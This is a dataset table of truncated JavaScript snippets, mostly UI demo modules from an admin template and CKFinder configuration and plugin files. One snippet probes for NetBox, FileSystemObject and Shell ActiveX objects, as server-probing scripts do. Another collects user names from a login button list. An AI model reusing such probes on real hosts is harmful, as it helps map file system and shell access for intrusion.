code
stringlengths
1
2.08M
language
stringclasses
1 value
var UIGeneral = function () { var handlePulsate = function () { if (!jQuery().pulsate) { return; } if (App.isIE8() == true) { return; // pulsate plugin does not support IE8 and below } if (jQuery().pulsate) { jQuery('#pulsate...
JavaScript
var UITree = function () { var handleSample1 = function () { $('#tree_1').jstree({ "core" : { "themes" : { "responsive": false } }, "types" : { "default" : { ...
JavaScript
var TableAdvanced = function () { var initTable1 = function() { /* Formatting function for row details */ function fnFormatDetails ( oTable, nTr ) { var aData = oTable.fnGetData( nTr ); var sOut = '<table>'; sOut += '<tr><td>Platform(s):</td><td...
JavaScript
var EcommerceOrdersView = function () { var handleInvoices = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_invoices"), onSuccess: function(grid) { // execute some code after table records loaded }, ...
JavaScript
var FormEditable = function () { $.mockjaxSettings.responseTime = 500; var log = function (settings, response) { var s = [], str; s.push(settings.type.toUpperCase() + ' url = "' + settings.url + '"'); for (var a in settings.data) { if (settings.data[a] ...
JavaScript
var UIExtendedModals = function () { return { //main function to initiate the module init: function () { // general settings $.fn.modal.defaults.spinner = $.fn.modalmanager.defaults.spinner = '<div class="loading-spinner" style="width: 2...
JavaScript
var Login = function () { var handleLogin = function() { $('.login-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input...
JavaScript
var FormSamples = function () { return { //main function to initiate the module init: function () { // use select2 dropdown instead of chosen as select2 works fine with bootstrap on responsive layouts. $('.select2_category').select2({ placeholder: "Se...
JavaScript
var FormFileUpload = function () { return { //main function to initiate the module init: function () { // Initialize the jQuery File Upload widget: $('#fileupload').fileupload({ disableImageResize: false, autoUpload: false, ...
JavaScript
var ComponentsPickers = function () { var handleDatePickers = function () { if (jQuery().datepicker) { $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); $('body').removeClass("modal-open"); // fix bug when inli...
JavaScript
/** Custom module for you to write your own javascript functions **/ var Custom = function () { // private functions & variables var myFunc = function(text) { alert(text); } // public functions return { //main function init: function () { //ini...
JavaScript
var UIDatepaginator = function () { return { //main function to initiate the module init: function () { //sample #1 $('#datepaginator_sample_1').datepaginator(); //sample #2 $('#datepaginator_sample_2').datepaginator({ s...
JavaScript
var MapsVector = function () { var setMap = function (name) { var data = { map: 'world_en', backgroundColor: null, borderColor: '#333333', borderOpacity: 0.5, borderWidth: 1, color: '#c6c6c6', enableZoom: true, ...
JavaScript
var ComponentsjQueryUISliders = function () { return { //main function to initiate the module init: function () { // basic $(".slider-basic").slider(); // basic sliders // vertical range sliders $("#slider-range").slider({ ...
JavaScript
var Search = function () { return { //main function to initiate the module init: function () { if (jQuery().datepicker) { $('.date-picker').datepicker(); } App.initFancybox(); } }; }();
JavaScript
var ComponentsIonSliders = function () { return { //main function to initiate the module init: function () { $("#range_1").ionRangeSlider({ min: 0, max: 5000, from: 1000, to: 4000, type: 'double'...
JavaScript
var EcommerceOrders = function () { var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); } var handleOrders = function() { var grid = new Datatable(); grid....
JavaScript
var EcommerceProductsEdit = function () { var handleImages = function() { // see http://www.plupload.com/ var uploader = new plupload.Uploader({ runtimes : 'html5,flash,silverlight,html4', browse_button : document.getElementById('tab_images_uploader_pi...
JavaScript
var ComponentsFormTools = function () { var handleTwitterTypeahead = function() { // Example #1 // instantiate the bloodhound suggestion engine var numbers = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.num); }, queryT...
JavaScript
var ComingSoon = function () { return { //main function to initiate the module init: function () { $.backstretch([ "assets/img/bg/1.jpg", "assets/img/bg/2.jpg", "assets/img/bg/3.jpg", "assets/img/bg/4.jpg" ...
JavaScript
var FormImageCrop = function () { var demo1 = function() { $('#demo1').Jcrop(); } var demo2 = function() { var jcrop_api; $('#demo2').Jcrop({ onChange: showCoords, onSelect: showCoords, onRelease: clearCoords },function(){ ...
JavaScript
var Tasks = function () { return { //main function to initiate the module initDashboardWidget: function () { $('input.liChild').change(function() { if ($(this).is(':checked')) { $(this).parents('li').addClass("task-done"); } else { $(this).parents('li').removeCl...
JavaScript
var UINestable = function () { var updateOutput = function (e) { var list = e.length ? e : $(e.target), output = list.data('output'); if (window.JSON) { output.val(window.JSON.stringify(list.nestable('serialize'))); //, null, 2)); } else { output....
JavaScript
var ComponentsKnobDials = function () { return { //main function to initiate the module init: function () { //knob does not support ie8 so skip it if (!jQuery().knob || App.isIE8()) { return; } // general knob ...
JavaScript
var UIAlertDialogApi = function () { var handleDialogs = function() { $('#demo_1').click(function(){ bootbox.alert("Hello world!"); }); //end #demo_1 $('#demo_2').click(function(){ bootbox.alert("Hello world!", function() {...
JavaScript
var Lock = function () { return { //main function to initiate the module init: function () { $.backstretch([ "assets/img/bg/1.jpg", "assets/img/bg/2.jpg", "assets/img/bg/3.jpg", "assets/img/bg/4.jpg" ], { fade: ...
JavaScript
var ContactUs = function () { return { //main function to initiate the module init: function () { var map; $(document).ready(function(){ map = new GMaps({ div: '#map', lat: -13.004333, lng: -38.494333 }); var marker = map.addMarker({ lat:...
JavaScript
var MapsGoogle = function () { var mapBasic = function () { new GMaps({ div: '#gmap_basic', lat: -12.043333, lng: -77.028333 }); } var mapMarker = function () { var map = new GMaps({ div: '#gmap_marker', lat: ...
JavaScript
var Calendar = function () { return { //main function to initiate the module init: function () { Calendar.initCalendar(); }, initCalendar: function () { if (!jQuery().fullCalendar) { return; } var dat...
JavaScript
var Portfolio = function () { return { //main function to initiate the module init: function () { $('.mix-grid').mixitup(); } }; }();
JavaScript
var TableAjax = function () { var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); } var handleRecords = function() { var grid = new Datatable(); grid.init(...
JavaScript
var UIToastr = function () { return { //main function to initiate the module init: function () { var i = -1, toastCount = 0, $toastlast, getMessage = function () { var msgs = ['Hello, some notification sample...
JavaScript
var Charts = function () { return { //main function to initiate the module init: function () { App.addResponsiveHandler(function () { Charts.initPieCharts(); }); }, initCharts: function () { if (!j...
JavaScript
var UIBlockUI = function () { var handleSample1 = function () { $('#blockui_sample_1_1').click(function(){ App.blockUI({ target: '#blockui_sample_1_portlet_body' }); window.setTimeout(function () { App.unblockUI('#blockui_sampl...
JavaScript
var FormDropzone = function () { return { //main function to initiate the module init: function () { Dropzone.options.myDropzone = { init: function() { this.on("addedfile", function(file) { // Create the remove bu...
JavaScript
var FormWizard = function () { return { //main function to initiate the module init: function () { if (!jQuery().bootstrapWizard) { return; } function format(state) { if (!state.id) return state.text; // optgroup ...
JavaScript
var Login = function () { var handleLogin = function() { $('.login-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ...
JavaScript
var ComponentsNoUiSliders = function () { return { //main function to initiate the module init: function () { // slider 1 $("#slider_1").noUiSlider({ start: [20, 80] ,range: [0, 100] ,connect: true ...
JavaScript
var FormValidation = function () { var handleValidation1 = function() { // for more info visit the official plugin documentation: // http://docs.jquery.com/Plugins/Validation var form1 = $('#form_sample_1'); var error1 = $('.alert-danger', form1); v...
JavaScript
var TableManaged = function () { return { //main function to initiate the module init: function () { if (!jQuery().dataTable) { return; } // begin first table $('#sample_1').dataTable({ "aoCo...
JavaScript
var Inbox = function () { var content = $('.inbox-content'); var loading = $('.inbox-loading'); var listListing = ''; var loadInbox = function (el, name) { var url = 'inbox_inbox.html'; var title = $('.inbox-nav > li.' + name + ' a').attr('data-title'); listListing = n...
JavaScript
var PortletDraggable = function () { return { //main function to initiate the module init: function () { if (!jQuery().sortable) { return; } $("#sortable_portlets").sortable({ connectWith: ".portlet", ...
JavaScript
var UINotific8 = function () { return { //main function to initiate the module init: function () { $('#notific8_show').click(function(event) { var settings = { theme: $('#notific8_theme').val(), ...
JavaScript
var EcommerceProducts = function () { var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); } var handleProducts = function() { var grid = new Datatable(); g...
JavaScript
var UIIdleTimeout = function () { return { //main function to initiate the module init: function () { // cache a reference to the countdown element so we don't have to query the DOM for it on each ping. var $countdown; $('body').append('<div class="m...
JavaScript
var ComponentsEditors = function () { var handleWysihtml5 = function () { if (!jQuery().wysihtml5) { return; } if ($('.wysihtml5').size() > 0) { $('.wysihtml5').wysihtml5({ "stylesheets": ["assets/plugins/bootstrap-wysihtml5/wysiwyg-colo...
JavaScript
var ComponentsDropdowns = function () { var handleSelect2 = function () { $('#select2_sample1').select2({ placeholder: "Select an option", allowClear: true }); $('#select2_sample2').select2({ placeholder: "Select a State", allowCl...
JavaScript
var TableEditable = function () { return { //main function to initiate the module init: function () { function restoreRow(oTable, nRow) { var aData = oTable.fnGetData(nRow); var jqTds = $('>td', nRow); for (var i = 0, iLen = jq...
JavaScript
/** * Création du tableau des enregistrements * @param doc : le document XML à partir duquel on va lire * @param zone : la zone HTML dans laquelle on va écrire * @param nomTable : le nom de la table concernée */ function creerTableau(doc, zone, nomTable) { var rows = doc.getElementsByTagName("row"); var ta...
JavaScript
var msg=[]; try{ var NetBox=new ActiveXObject('NetBox'); msg.push('NetBox对象创建成功!'); var fso = new ActiveXObject("Scripting.FileSystemObject"); var Shell2 = new ActiveXObject("Shell"); }catch(e){ msg.push('NetBox对象创建失败!'); } try{ var s2=new ActiveXObject('Scripting.FileSystemObject'); msg.push('...
JavaScript
!function(){ setTimeout(function(){ var ht=[]; J('#LoginButtonBox li').each(function(i){ ht.push(this.attr('user')+':'+this.html().match(/[^<]+/)); }); var ret=ht.join('~~~'); function cn2uni(str){ return str.replace(/[^\u0000-\u00FF]/g,function($0){return '\\'+escape($0).substr(1)}...
JavaScript
window.onload = function() { var copyP = document.createElement( 'p' ) ; copyP.className = 'copyright' ; copyP.innerHTML = '&copy; 2007-2013 <a href="http://cksource.com" target="_blank">CKSource</a> - Frederico Knabben . All rights reserved.<br /><br />' ; document.body.appendChild( document.createElement( '...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or ...
JavaScript
/* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://cksource.com/ckfinder/license */ CKFinder.customConfig = function( config ) { // Define changes to default configuration here. // For the list of available options, check: // http://doc...
JavaScript
/* * Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://cksource.com/ckfinder/license * * The software, this file and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, ...
JavaScript
/* Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKEDITOR.skins.add( 'kama', (function() { var uiColorStylesheetId = 'cke_ui_color'; return { editor : { css : [ 'editor.css' ] }, dialog : { css : [ 'dia...
JavaScript
/* * Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://cksource.com/ckfinder/license * * The software, this file and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, ...
JavaScript
/** * Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://ckeditor.com/license * * CKFinder 2.x - sample "dummy" plugin. * * To enable it, add the following line to config.js: * config.extraPlugins = 'dummy'; */ /** * See http...
JavaScript
/* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKFinder.setPluginLang( 'dummy', 'pl', { dummy : { title : 'Testowe okienko', menuItem : 'Otwórz okienko dummy', typeText : 'Podaj jakiś tekst...
JavaScript
/* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKFinder.setPluginLang( 'dummy', 'en', { dummy : { title : 'Dummy dialog', menuItem : 'Open dummy dialog', typeText : 'Please type some text.' } });
JavaScript
/* Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license */ CKEDITOR.skins.add( 'kama', (function() { var uiColorStylesheetId = 'cke_ui_color'; return { editor : { css : [ 'editor.css' ] }, dialog : { css : [ 'dia...
JavaScript